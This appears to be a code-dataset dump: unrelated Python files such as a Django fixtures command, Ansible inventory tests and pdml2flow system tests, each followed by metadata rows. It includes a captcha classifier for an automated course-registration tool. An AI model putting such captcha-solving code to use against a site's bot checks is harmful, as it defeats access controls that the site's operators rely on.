    # show an options menu and read the chosen option
    while True:
        print('1 - (C) Add new name')
        print('2 - (R) Add phone')
        print('3 - (U) Remove phone')
        print('4 - (D) Remove name')
        print('5 - Show phone book')
        print('0 - End of program')
        print('=' * 30)
        opcao = int(input('Enter your option: '))
        if opcao in (1, 2, 3, 4, 5, 0):
            return opcao
        else:
            print('Invalid option')
def main():
    while True:
        op = menu()
        if op == 1 or op == 2:  # create
            criar()
        elif op == 3 or op == 4:  # delete
            # keys are names (strings), so read the name directly
            codigo = input('Name to remove: ')
            if codigo in agenda:
                apagar(codigo)
            else:
                print(f'No name with key {codigo} exists in the phone book.')
        elif op == 5:  # list everything
            Agenda_telefonica()
        elif op == 0:  # end of program
            print('End of program.')
            break
        else:
            pass
if __name__ == '__main__':
main()
| 29.082707 | 83 | 0.572389 | 493 | 3,868 | 4.470588 | 0.320487 | 0.038113 | 0.039927 | 0.047187 | 0.128403 | 0.063521 | 0.038113 | 0.038113 | 0.038113 | 0.038113 | 0 | 0.018059 | 0.312823 | 3,868 | 132 | 84 | 29.30303 | 0.811136 | 0.259049 | 0 | 0.144578 | 0 | 0 | 0.283245 | 0 | 0 | 0 | 0 | 0.007576 | 0 | 1 | 0.084337 | false | 0.012048 | 0 | 0 | 0.108434 | 0.228916 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39464a019cb985cdafeee6f4d457d7fc18ed469a | 377 | py | Python | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | from django.urls import path, include
from . import views
from rest_framework import routers
router = routers.DefaultRouter()
router.register('MyAPI', views.ApprovalsView)
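# DefaultRouter generates the standard list/detail routes for the registered
# viewset, e.g. MyAPI/ and MyAPI/<pk>/ (assuming ApprovalsView is a ViewSet).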
urlpatterns = [
path('api/', include(router.urls)),
path('status/', views.approvereject),
path('form/', views.cxcontact, name='cxform'),
path('form2/', views.cxcontact2, name='cxform2'),
] | 31.416667 | 53 | 0.71618 | 44 | 377 | 6.113636 | 0.590909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009119 | 0.127321 | 377 | 12 | 54 | 31.416667 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0.10582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3949804a27d13ac40bfeeab53fe441faa29640de | 2,900 | py | Python | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 796 | 2019-10-19T19:58:12.000Z | 2022-03-22T14:02:37.000Z | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 224 | 2019-10-19T17:45:12.000Z | 2022-03-24T20:46:29.000Z | backend/core/management/commands/load_fixtures.py | Swapnil070797/falco | 2576bee2e385aa62cf93ab5f27234bb51313b416 | [
"MIT"
] | 33 | 2019-10-22T21:17:09.000Z | 2021-12-23T06:08:26.000Z | from datetime import timedelta
from django.core.management.base import BaseCommand
from django.utils import timezone
from audits.factories import (
AuditFactory,
AuditResultsFactory,
AuditStatusHistoryFactory,
)
from audits.models import Audit, AuditResults
from core.factories import AdminFactory, UserFactory
from projects.factories import (
PageFactory,
ProjectAuditParametersFactory,
ProjectFactory,
ProjectMemberRoleFactory,
)
from projects.models import NetworkShapeOptions
class Command(BaseCommand):
help = "Load a set of fixtures"
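    # As a Django management command this is typically invoked with:
    #   python manage.py load_fixtures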
def handle(self, *args, **options):
# Creates an admin with the credentials `admin // admin`
admin = AdminFactory()
user = UserFactory()
# Creates a first project with admin as an admin
project = ProjectFactory()
ProjectMemberRoleFactory(user=admin, project=project)
ProjectMemberRoleFactory(user=user, project=project, is_admin=False)
parameters_project = ProjectAuditParametersFactory(project=project)
parameters2_project = ProjectAuditParametersFactory(
project=project,
name="Dulles | Chrome | 3G",
network_shape=NetworkShapeOptions.THREE_G.name,
)
page = PageFactory(project=project)
page2 = PageFactory(project=project, name="Docs")
        # Creates a month worth of audits, with history and results:
        # one audit per (parameter set, page) combination, backdated per day
        for day in range(0, 30):
            timestamp = timezone.now() - timedelta(days=day)
            for parameters, audit_page in [
                (parameters_project, page),
                (parameters2_project, page),
                (parameters_project, page2),
                (parameters2_project, page2),
            ]:
                audit = AuditFactory(parameters=parameters, page=audit_page)
                Audit.objects.filter(pk=audit.pk).update(created_at=timestamp)
                AuditStatusHistoryFactory(audit=audit)
                results = AuditResultsFactory(audit=audit)
                AuditResults.objects.filter(pk=results.pk).update(
                    created_at=timestamp
                )
| 42.647059 | 84 | 0.704483 | 286 | 2,900 | 7.083916 | 0.318182 | 0.051333 | 0.05923 | 0.067127 | 0.272458 | 0.146101 | 0.146101 | 0 | 0 | 0 | 0 | 0.012265 | 0.212759 | 2,900 | 67 | 85 | 43.283582 | 0.875164 | 0.054828 | 0 | 0 | 0 | 0 | 0.016807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.145455 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3949fe35326199497ec243fad616b2c474910cea | 409 | py | Python | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | palindrome_program.py | shubham13202/Palindrome_number | af01bb105ea8bd1cef0311f084ba1ad409d0cf59 | [
"MIT"
] | null | null | null | """n = int(input("Enter the number: "))
temp = n
new = 0
while temp > 0:
d = temp % 10
new = new * 10 + d
temp = temp //10
if n == new:
print("Number is palindrome")
else:
print("Number is not palindrome")
#print(palindrome(101))
"""
var1 = input("Enter the sequence: ")
x = var1[::-1]
if var1 == x:
    print("It is a Palindrome Number")
else:
    print("It is not a Palindrome Number")
| 17.782609 | 42 | 0.599022 | 65 | 409 | 3.769231 | 0.4 | 0.081633 | 0.106122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 0.229829 | 409 | 22 | 43 | 18.590909 | 0.730159 | 0.608802 | 0 | 0 | 0 | 0 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394ae53df762a37668f92d5a8c275bd8a607f470 | 7,493 | py | Python | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | test/units/plugins/inventory/test_inventory.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | # Copyright 2015 Abhijit Menon-Sen <ams@2ndQuadrant.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
import textwrap
from ansible import constants as C
from ansible.compat.tests import mock
from ansible.compat.tests import unittest
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_text
from units.mock.path import mock_unfrackpath_noop
from ansible.inventory.manager import InventoryManager, split_host_pattern
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
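    # split_host_pattern accepts either a single pattern string or a list of
    # pattern strings; the cases above exercise both call forms.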
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],
'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])],
}
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class TestInventoryPlugins(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_variables_stringify(self):
values = ['string', 'no', 'No', 'false', 'FALSE', [], False, 0]
inventory_content = "host1 "
inventory_content += ' '.join(['var%s=%s' % (i, to_text(x)) for i, x in enumerate(values)])
inventory = self._get_inventory(inventory_content)
variables = inventory.get_host('host1').vars
for i in range(len(values)):
if isinstance(values[i], string_types):
self.assertIsInstance(variables['var%s' % i], string_types)
else:
self.assertIsInstance(variables['var%s' % i], type(values[i]))
@mock.patch('ansible.inventory.manager.unfrackpath', mock_unfrackpath_noop)
@mock.patch('os.path.exists', lambda x: True)
@mock.patch('os.access', lambda x, y: True)
def test_yaml_inventory(self, filename="test.yaml"):
inventory_content = {filename: textwrap.dedent("""\
---
all:
hosts:
test1:
test2:
""")}
C.INVENTORY_ENABLED = ['yaml']
fake_loader = DictDataLoader(inventory_content)
im = InventoryManager(loader=fake_loader, sources=filename)
self.assertTrue(im._inventory.hosts)
self.assertIn('test1', im._inventory.hosts)
self.assertIn('test2', im._inventory.hosts)
self.assertIn(im._inventory.get_host('test1'), im._inventory.groups['all'].hosts)
self.assertIn(im._inventory.get_host('test2'), im._inventory.groups['all'].hosts)
self.assertEqual(len(im._inventory.groups['all'].hosts), 2)
self.assertIn(im._inventory.get_host('test1'), im._inventory.groups['ungrouped'].hosts)
self.assertIn(im._inventory.get_host('test2'), im._inventory.groups['ungrouped'].hosts)
self.assertEqual(len(im._inventory.groups['ungrouped'].hosts), 2)
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)
| 36.730392 | 113 | 0.577472 | 962 | 7,493 | 4.366944 | 0.246362 | 0.009998 | 0.033325 | 0.046656 | 0.418234 | 0.310878 | 0.248274 | 0.195192 | 0.195192 | 0.166627 | 0 | 0.052632 | 0.244361 | 7,493 | 203 | 114 | 36.91133 | 0.689332 | 0.117309 | 0 | 0.201342 | 0 | 0.006711 | 0.197482 | 0.022296 | 0 | 0 | 0 | 0 | 0.161074 | 1 | 0.067114 | false | 0 | 0.073826 | 0 | 0.187919 | 0.006711 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394e6287c45dd4b169b78862df54b129511b5346 | 1,495 | py | Python | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | test_pyparsing_3_1.py | luluci/gui_env | 9c2ffe331c2dc8a7e128474ce9590498082de569 | [
"MIT"
] | null | null | null | import pyparsing as pp
def act_comment(token):
print("comment: " + str(token))
def act_keyword(token):
print("keyword: " + str(token))
def act_sc(token):
print("semicolon: " + str(token))
def act_parser_start(token):
print("parser_start: " + str(token))
def act_parser_end(token):
print("parser_end: " + str(token))
comment_parser = pp.Group(
(pp.Literal("//") + pp.restOfLine)
| pp.cStyleComment
).setParseAction(act_comment)
pp_key1 = pp.Keyword("hoge")
pp_key2 = pp.Keyword("fuga")
pp_sc = pp.Literal(";")
statement = pp.Group(
pp.Empty().setParseAction(act_parser_start)
+ pp_key1.setParseAction(act_keyword)
+ pp_key2.setParseAction(act_keyword)
+ pp_sc.setParseAction(act_sc)
+ pp.Empty().setParseAction(act_parser_end)
)
parser = statement[1, ...].ignore(comment_parser)
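# statement[1, ...] is pyparsing 3's repetition syntax for "one or more".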
test_text = """\
hoge fuga; // comment1
hoge /* comment2-1 */ fuga; /* comment2-2 */
// comment3
hoge fuga; // comment4
"""
ret = parser.parseString(test_text)
print(ret)
"""
[result]
parser_start: []
keyword: ['hoge']
keyword: ['fuga']
semicolon: [';']
comment: [['//', ' comment1']]
parser_end: []
parser_start: []
keyword: ['hoge']
comment: [['/* comment2-1 */']]
keyword: ['fuga']
semicolon: [';']
comment: [['/* comment2-2 */']]
comment: [['//', ' comment3']]
parser_end: []
parser_start: []
keyword: ['hoge']
keyword: ['fuga']
semicolon: [';']
comment: [['//', ' comment4']]
parser_end: []
parser_start: []
[['hoge', 'fuga', ';'], ['hoge', 'fuga', ';'], ['hoge', 'fuga', ';']]
"""
| 19.166667 | 69 | 0.646154 | 181 | 1,495 | 5.149171 | 0.21547 | 0.082618 | 0.04721 | 0.060086 | 0.255365 | 0.148069 | 0.10515 | 0.10515 | 0 | 0 | 0 | 0.014548 | 0.126421 | 1,495 | 77 | 70 | 19.415584 | 0.699081 | 0 | 0 | 0 | 0 | 0 | 0.17449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147059 | false | 0 | 0.029412 | 0 | 0.176471 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
394ecf34ca7686c2864f4d097b99dc46fa95d1e2 | 1,537 | py | Python | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 304 | 2021-11-05T13:13:08.000Z | 2022-03-27T17:53:37.000Z | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 62 | 2021-11-02T15:59:16.000Z | 2022-03-31T18:23:15.000Z | tests/todo/dot.py | bryevdv/cunumeric | 7965ceb96d3252371c22cf32d38ac91c4db77a38 | [
"Apache-2.0"
] | 26 | 2021-11-09T09:01:04.000Z | 2022-02-25T15:57:22.000Z | # Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import cunumeric as num
def test():
a = num.array([[1, 2, 3, 4, 5, 6], [4, 5, 6, 7, 8, 9]], dtype=np.float64)
b = num.array(
[[10, 11], [12, 13], [14, 15], [16, 17], [18, 19], [20, 21]],
dtype=np.float64,
)
c = a.dot(b)
assert num.array_equal(c, [[350, 371], [620, 659]])
d = num.array([1, 2, 3, 4, 5, 6], dtype=np.float64)
e = num.array([1, 2, 3, 4, 5, 6], dtype=np.float64)
f = d.dot(e)
assert f == 91
# This test does not work ATM. It seems that setting random seed to
# be the same is not sufficient to make the inputs the same.
# num.random.seed(42)
# a = num.random.randn(1, 3, 15)
# b = num.random.randn(15, 16)
# c = a[0].dot(b)
# np.random.seed(42)
# an = np.random.randn(1, 3, 15)
# bn = np.random.randn(15, 16)
# cn = an[0].dot(bn)
# assert num.allclose(c, cn)
return
if __name__ == "__main__":
test()
| 27.945455 | 77 | 0.62069 | 260 | 1,537 | 3.634615 | 0.5 | 0.063492 | 0.012698 | 0.031746 | 0.10582 | 0.074074 | 0.074074 | 0.074074 | 0.059259 | 0.059259 | 0 | 0.088586 | 0.236174 | 1,537 | 54 | 78 | 28.462963 | 0.716354 | 0.58946 | 0 | 0 | 0 | 0 | 0.013223 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.058824 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39514311e1de0c6b9b8fe2b0f0b8804f4d55eecd | 1,005 | py | Python | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | 1 | 2022-03-13T19:27:50.000Z | 2022-03-13T19:27:50.000Z | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | null | null | null | mocasin/maps/platform/__init__.py | tud-ccc/mocasin | 6cf0a169e24d65d0fc859398f181dd500f928340 | [
"0BSD"
] | null | null | null | # Copyright (C) 2017 TU Dresden
# Licensed under the ISC license (see LICENSE.txt)
#
# Authors: Christian Menard
import logging
from hydra.utils import to_absolute_path
from .convert import convert
from .parse import parse
from mocasin.common.platform import Platform
log = logging.getLogger(__name__)
class MapsPlatform(Platform):
def __init__(self, name, xml_file, **kwargs):
super().__init__(
name,
symmetries_json=kwargs.get("symmetries_json", None),
embedding_json=kwargs.get("embedding_json", None),
)
log.info("start parsing the platform description")
xml_platform = parse(to_absolute_path(xml_file), True)
convert(
self,
xml_platform,
scheduler_cycles=kwargs.get("scheduler_cycles", None),
fd_frequencies=kwargs.get("fd_frequencies", None),
ppm_power=kwargs.get("ppm_power", None),
)
log.info("done parsing the platform description")
| 28.714286 | 66 | 0.664677 | 118 | 1,005 | 5.40678 | 0.483051 | 0.070533 | 0.043887 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005236 | 0.239801 | 1,005 | 34 | 67 | 29.558824 | 0.829843 | 0.103483 | 0 | 0 | 0 | 0 | 0.159598 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.217391 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3952324dfb1c3711021424481c4d89c71b0f8d7a | 2,020 | py | Python | autoelective/captcha/classifier.py | 12f23eddde/PKUAutoElective | 1a7094ea14a90fb23a3bd33d013bf5a46127394f | [
"MIT"
] | 24 | 2019-09-13T11:58:32.000Z | 2022-02-22T02:38:25.000Z | autoelective/captcha/classifier.py | yzy-pku/PKUAutoElective | 309f8472fc5ba751d46373ea51fa72e1aa3148b0 | [
"MIT"
] | 5 | 2020-09-21T16:23:20.000Z | 2022-01-13T01:37:13.000Z | autoelective/captcha/classifier.py | yzy-pku/PKUAutoElective | 309f8472fc5ba751d46373ea51fa72e1aa3148b0 | [
"MIT"
] | 5 | 2019-09-20T15:36:54.000Z | 2021-09-10T14:32:19.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# filename: classifier.py
# modified: 2019-09-08
__all__ = ["KNN","SVM","RandomForest"]
import os
import re
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
import joblib
from .feature import get_feature_extractor
from ..const import MODEL_DIR
from ..utils import Singleton
_regexModelFilename = re.compile(
pattern=(
r'^(?P<alg>\S+)\.model\.'
r'f(?P<feature>[1-5])\.'
r'(?:l(?P<level>\d{1})\.)*'
r'c(?P<compress>\d{1})'
r'(?P<ext>\.z|\.gz|\.bz2|\.xz|\.lzma)$'
),
flags=re.I,
)
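# Illustrative example (hypothetical filename, not shipped with the repo):
# "KNN.model.f3.l1.c9.gz" matches with alg="KNN", feature="3",
# level="1", compress="9", ext=".gz".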
def _get_MODEL_FILES():
model_files = {}
for file in os.listdir(MODEL_DIR):
res = _regexModelFilename.match(file)
if res is not None:
filename = res.group()
resDict = res.groupdict()
alg = resDict.pop("alg")
resDict["path"] = os.path.abspath(os.path.join(MODEL_DIR, filename))
model_files[alg] = resDict
return model_files
_MODEL_FILES = _get_MODEL_FILES()
class BaseClassifier(object, metaclass=Singleton):
ALG = ""
def __init__(self):
if self.__class__ is __class__:
raise NotImplementedError
clf, feature = self._load_model()
self._clf = clf
self.feature = feature
    def _load_model(self):
        alg = self.__class__.ALG
        detail = _MODEL_FILES.get(alg)
        if detail is None:
            raise FileNotFoundError("model %s.* is missing" % alg)
        path, fCode, lCode = map(detail.__getitem__, ("path","feature","level"))
        feature = get_feature_extractor(fCode, lCode)
        return joblib.load(path), feature
def predict(self, Xlist):
return self._clf.predict(Xlist)
class RandomForest(BaseClassifier):
ALG = "RandomForest"
class KNN(BaseClassifier):
ALG = "KNN"
class SVM(BaseClassifier):
ALG = "SVM" | 24.047619 | 80 | 0.630198 | 247 | 2,020 | 4.94332 | 0.412955 | 0.05733 | 0.031122 | 0.03276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009721 | 0.236139 | 2,020 | 84 | 81 | 24.047619 | 0.781594 | 0.043564 | 0 | 0 | 0 | 0 | 0.105236 | 0.053396 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.160714 | 0.017857 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a31cbe01406213bfcaaf90c2882397642fc68d4 | 3,419 | py | Python | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 12 | 2016-04-01T10:59:14.000Z | 2022-01-27T04:05:43.000Z | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 16 | 2016-03-18T10:44:00.000Z | 2019-08-12T05:52:24.000Z | test/test_system.py | Enteee/pdml2flow | 2e5da6f03bc799f0e8ef77dd987031b969d4a5df | [
"Apache-2.0"
] | 2 | 2016-09-08T11:49:39.000Z | 2020-09-09T04:39:15.000Z | # vim: set fenc=utf8 ts=4 sw=4 et :
import os
import io
import json
import unittest
from shlex import split
from .testcase import TestCase
from pdml2flow.conf import Conf
import pdml2flow
TEST_DIR_PDML2FLOW="test/pdml2flow_tests/"
TEST_DIR_PDML2FRAME="test/pdml2frame_tests/"
class TestSystem(TestCase):
def read_json(self, f):
objs = []
data = ''
for line in f:
data += line
try:
objs.append(json.loads(data))
data = ''
except ValueError:
# Not yet a complete JSON value
pass
return objs
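    # Illustrative sketch (not part of the original tests): feeding the
    # lines of '{"a": 1}\n[1,\n2]\n' yields [{"a": 1}, [1, 2]], since each
    # line is buffered until json.loads succeeds on the accumulated text.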
def get_test(run, directory, test):
def system_test(self):
if os.path.isfile('{}/{}/skip'.format(directory, test)):
self.skipTest('Skipfile found')
with open('{}/{}/stdin'.format(directory, test)) as f_stdin, \
io.StringIO() as f_stdout, \
io.StringIO() as f_stderr:
# wire up io
Conf.IN = f_stdin
Conf.OUT = f_stdout
Conf.OUT_DEBUG = f_stderr
Conf.OUT_WARNING = f_stderr
Conf.OUT_ERROR = f_stderr
try:
# try to load arguments
with open('{}/{}/args'.format(directory, test)) as f:
Conf.ARGS = split(f.read())
except FileNotFoundError:
Conf.ARGS = ''
# run
run()
# compare stdout
stdout_raw = f_stdout.getvalue()
stderr_raw = f_stderr.getvalue()
with open('{}/{}/stdout'.format(directory, test)) as f:
expected_raw = f.read()
# Try parsing as json, and compare objects
run_objs = self.read_json(stdout_raw)
expected_objs = self.read_json(expected_raw)
self.assertEqual(
len(run_objs),
len(expected_objs)
)
            for e in expected_objs:
                self.assertIn(
                    e,
                    run_objs
                )
for o in run_objs:
self.assertIn(
o,
expected_objs
)
# if no object loaded: do a raw comparison, line by line
if len(run_objs) == 0 or len(expected_objs) == 0:
self.assertEqual(
sorted(
stdout_raw.splitlines()
),
sorted(
expected_raw.splitlines()
)
)
try:
# try compare stderr
with open('{}/{}/stderr'.format(directory, test)) as f:
